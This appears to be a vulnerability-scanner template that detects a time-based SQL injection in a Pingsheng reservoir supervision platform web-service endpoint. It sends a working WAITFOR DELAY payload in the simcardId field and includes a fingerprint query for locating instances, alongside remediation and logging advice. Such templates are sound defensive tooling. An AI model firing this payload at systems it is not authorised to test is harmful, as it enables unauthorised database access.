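# Detection template for a time-based SQL injection in the
# GetAllRechargeRecordsBySIMCardId web-service method of the Pingsheng
# Electronic Reservoir Supervision Platform. It sends one POST request and
# reports a finding only when the response is both delayed and shaped like
# the service's normal XML reply (see the matcher notes below).
id: pingsheng-electronic-sqli

info:
  name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
  author: securityforeveryone
  severity: high
  description: |
    There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
  # No vendor advisory or fixed version is cited in the references, so the
  # remediation below is limited to general hardening guidance.
  remediation: |
    Bind the simcardId value as a query parameter instead of concatenating it into SQL, require authentication on the SIMMaintainService.asmx web service, and restrict network access to the platform until a vendor fix has been confirmed and applied.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    - https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
  # CWE-89: improper neutralization of special elements in an SQL command.
  # No CVSS vector is given because the page does not provide one.
  classification:
    cwe-id: CWE-89
  metadata:
    verified: "true"
    # One request per target; keep this in sync if a baseline request is added.
    max-request: 1
    # Product fingerprint string, useful for finding your own exposed instances.
    fofa-query: "js/PSExtend.js"
  tags: sqli,pingsheng

http:
  # The request timeout is raised to 20s inside the raw block so that the
  # deliberate 6-second database delay is not cut off by the default timeout.
  # Comments cannot be placed inside the block scalar itself: they would be
  # sent as part of the request.
  - raw:
      - |
        @timeout 20s
        POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--

    # All four expressions must hold (condition: and). Response time alone is
    # a weak signal, since a slow or overloaded host can exceed 6 seconds
    # without being vulnerable. The body, content-type and status checks
    # narrow the match to what appears to be this service's XML reply.
    # NOTE(review): with a single request there is no un-delayed baseline to
    # compare against; confirm a positive result manually before reporting.
    # Defenders: POST bodies to this endpoint whose simcardId contains a quote,
    # a statement separator or WAITFOR are worth alerting on in web/WAF logs.
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains_all(body,"Result","false","Message")'
          - 'contains(content_type,"text/xml")'
          - 'status_code == 200'
        condition: and
# NOTE(review): the digest below was issued for the upstream template text.
# Any edit to this file, comments included, changes the signed content, so
# re-sign the template before relying on signature verification.
# digest: 4a0a004730450220496311996edc771bcc56eb44c74ed2d48fe8a4d19fbe73b626b9ec4807aaa6e5022100ee7b686afbd156f43d0e1f827405e71e15f4a33638379d8d119fe06955e236b1:922c64590222798bb761d5b6d8e72950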